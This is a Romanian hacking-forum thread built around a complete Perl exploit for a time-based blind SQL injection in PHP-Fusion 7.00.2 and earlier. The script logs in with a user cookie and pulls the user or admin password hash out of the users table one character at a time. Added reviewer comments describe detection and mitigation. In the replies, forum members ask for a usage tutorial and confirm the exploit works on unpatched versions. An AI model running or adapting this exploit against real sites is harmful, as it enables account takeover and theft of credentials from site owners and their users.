#!/usr/bin/perl -w
# Forum post by vini4p (Guest), posted December 25, 2008.
# -------------------------------------------------------
# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit
# by athos - staker[at]hotmail[dot]it
# download on http://php-fusion.co.uk
# -------------------------------------------------------
# Usage:
# perl xpl.pl host/path prefix user_id user_pwd target_id
# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1
# -------------------------------------------------------
# Note: magic_quotes_gpc off
# don't add me on msn messenger
# my email staker.38@gmail.com
#
# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer
# -------------------------------------------------------
# User Password: my $field = "user_password" ;
# Admin Password: my $field = "user_admin_password";
# -------------------------------------------------------
#
# Reviewer notes (defensive reading of this proof of concept)
#
# What the code does: it sends authenticated POST requests to the link
# submission form (submit.php?stype=l) in which one form field,
# submit_info[pwn], carries an SQL fragment. The fragment makes the database
# burn CPU time in BENCHMARK() when a guessed character of a column in
# <prefix>_users is correct, so the answer is read from response latency
# alone (time-based blind SQL injection).
#
# Preconditions visible in this file: a valid account on the target (the
# cookie is built from a user id and that user's password) and, per the
# author's note, magic_quotes_gpc disabled. The payload opens with a single
# quote and ends with '#', so presumably submit_info values are placed inside
# a quoted SQL string without escaping -- confirm against submit.php of the
# affected release.
#
# Detection:
#   - POST bodies to submit.php?stype=l whose submit_info[...] value contains
#     a quote together with benchmark( / substring( / select.
#   - Bursts of near-identical requests from one session: up to 16 candidates
#     per character position, 32 positions.
#   - Requests to that endpoint that take many seconds, with matching
#     database CPU spikes or slow-query-log entries mentioning BENCHMARK.
#   - The script never sets a User-Agent, so the LWP default
#     ("libwww-perl/<version>") is sent.
#
# Mitigation:
#   - Upgrade past 7.00.2; the fixed release is not named in this file.
#   - Escape or parameterize every request value used in SQL inside the
#     application; magic_quotes_gpc was never a security control and was
#     removed in PHP 5.4.
#   - If logs show the pattern above, treat the password hashes in the users
#     table as disclosed and force password resets.
# -------------------------------------------------------
use strict;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

# Column whose value is probed; the header above names the two alternatives.
my $field = "user_password";
# NOTE(review): $hash is never used, and $start/$stop are re-declared with
# `my` inside the loop below, so these file-scope copies are never assigned.
my ($stop,$start,$hash);

# Positional command-line arguments, in the order given in the usage text.
my $domain = shift;             # host/path of the installation
my $ptable = shift;             # table prefix
my $ulogin = shift;             # user id of the account used to log in
my $plogin = shift;             # password of that account
my $userid = shift or &usage;   # id of the probed row; usage() if missing or false

# ASCII codes for '0'-'9' and 'a'-'f', i.e. lowercase hexadecimal digits.
my @chars = (48..57, 97..102);
# Position (as passed to SQL substring()) of the character under test.
my $substr = 1;
my $http = new LWP::UserAgent;

# Sends one POST to http://<domain>/submit.php?stype=l carrying the given
# payload in the submit_info[pwn] form field.
#
# Argument: the payload string; the sub dies when it is missing or false
# ($! is not set by shift, so the die message is not meaningful).
# Returns: implicitly, the value of the last assignment (the LWP response).
# The caller ignores it and the HTTP status is never inspected.
sub send_request
{
    my $post = undef;
    my $host = $domain;
    my $param = shift @_ or die $!;

    $host .= "/submit.php?stype=l";

    # Authenticate as an existing account: the cookie value is
    # "<user id>.<md5 hex of the password>".
    $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));

    # The link_* and submit_link fields are constant filler for the form;
    # only submit_info[pwn] varies between requests.
    $post = $http->post('http://'.$host,[
        'link_category' => 1,
        'link_name' => 1,
        'link_url' => 1,
        'link_description' => 1,
        'submit_link' => 'Submit+Link',
        'submit_info[pwn]' => $param,
    ]);
}

# Builds the SQL fragment for one guess.
#
# Arguments: $charz is the candidate ASCII code, $uidz the character position.
# $field, $ptable and $userid are read from file scope.
# Returns: a string that compares ascii(substring($field, $uidz, 1)) with
# $charz for the row where user_id = $userid and calls benchmark() only when
# they are equal; the trailing '#' comments out the rest of the statement.
sub give_char
{
    my $send = undef;
    my ($charz,$uidz) = @_;

    $send = "' or (select if((ascii(substring".
            "($field,$uidz,1))=$charz),".
            "benchmark(230000000,char(0)),".
            "0) from ${ptable}_users where user_id=$userid))#";
    return $send;
}

# Main loop: 32 outer iterations, presumably one per character of a 32-digit
# MD5 hex value -- TODO confirm against the column format.
# For each candidate the wall-clock time of one request is measured; time()
# has one-second resolution, so "> 6" means at least 7 clock seconds.
# A slow response is taken as a match: the character is printed and $substr
# advances. When no candidate is slow, $substr is not advanced and the next
# outer iteration tests the same position again.
for(1..32) {
    foreach my $set(@chars) {
        my $start = time();
        send_request(give_char($set,$substr));
        my $stop = time();
        if($stop - $start > 6) {
            syswrite(STDOUT,chr($set));
            $substr++;
            last;
        }
    }
}

# Prints the banner and usage lines, then exits.
# NOTE(review): the banner says "7.0.2" while the header comment says
# "7.00.2"; the strings are left as the author wrote them.
sub usage
{
    print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n";
    print "by athos - staker[at]hotmail[dot]it\n";
    print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n";
    print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n";
    exit;
}
Hugo Posted March 18, 2009 Report Posted March 18, 2009 Cred ca pentru cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si cateva cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum :) Quote
fjtr Posted March 18, 2009 Report Posted March 18, 2009 # -------------------------------------------------------# Usage:# perl xpl.pl host/path prefix user_id user_pwd target_id# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1# ------------------------------------------------------- Quote
hi2na Posted March 20, 2009 Report Posted March 20, 2009 ceva scris ar fi supper sau mai super un tutorial video pls :D: Quote
luyzette Posted March 20, 2009 Report Posted March 20, 2009 vini4p iti cam place sa te lasi rugat? Quote
Laur13 Posted July 2, 2009 Report Posted July 2, 2009 Iti bat la pariu ca nu merge exploitul ... PS: este exploit in perl, ActivePerl ... il downloadezi de pe ActivePerl Quote
Laur13 Posted July 2, 2009 Report Posted July 2, 2009 "Cred ca pt cei interesati (si mai nepriceputi) ar fi mai de ajutor daca ai scrie si catea cuvinte despre ce sa faca cu textul de mai sus! Efortul este apreciat oricum:)" Eu am raspuns la ce mi-a zis hugo ... Quote
Zatarra Posted July 3, 2009 Report Posted July 3, 2009 Laur nu sti tu sa`l faci sa mearga aia ii altceva Quote
Laur13 Posted July 3, 2009 Report Posted July 3, 2009 ma.... se executa cu perl .. cum sa nu stiu sa mearga nu merge la php fusion sa rezolvat de mult vulnerabilitatea Quote
Vlachs Posted July 4, 2009 Report Posted July 4, 2009 "ma.... se executa cu perl .. cum sa nu stiu sa mearga nu merge la php fusion sa rezolvat de mult vulnerabilitatea" daca ai venit sa te dai scafandru pe aici mai bine lasa-ne, logic ca pentru versiunea indicata inca merge (PHP-Fusion <= 7.0.2) Quote
Laur13 Posted July 4, 2009 Report Posted July 4, 2009 (edited) benny loppa scuze dar nu am venit aici sa ma dau mare eu stiu 1 % din ce sti tu .Eu m-am referit ca nu merge pe ultima versiune .Am incercat vulnerabilitatea e functionala. Edited July 4, 2009 by Laur13 Quote
Zatarra Posted July 6, 2009 Report Posted July 6, 2009 Ce se mai scoate baiatul.. nu are rost sa`i explici benny ca tot nu intzelege Quote